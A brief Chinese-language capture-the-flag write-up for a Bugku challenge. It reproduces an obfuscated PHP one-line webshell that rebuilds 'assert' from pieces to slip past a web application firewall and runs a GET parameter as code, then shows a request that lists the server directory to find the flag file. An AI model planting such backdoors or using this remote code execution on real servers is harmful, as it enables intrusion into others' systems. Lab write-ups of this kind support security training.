Bugku_CTF Writeup 之 过狗一句话

题目说明:

http://120.24.86.145:8010/

送给大家一个过狗一句话
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

1.题目给出的一句话木马使我们能够用assert函数执行任意命令s

2.那就执行扫描后台喽:http://120.24.86.145:8010/?s=print_r(scandir('./'))

3.得到:Array ( [0] => . [1] => .. [2] => f94lag.txt [3] => index.php [4] => mm.php [5] => shell.php [6] => update.php [7] => webshell.php [8] => ТНЈЮФБОЮФЕЕ .txt ) ss

4.访问 http://120.24.86.145:8010/f94lag.txt 得到flag

猜你喜欢

转载自www.cnblogs.com/izayoi/p/9638304.html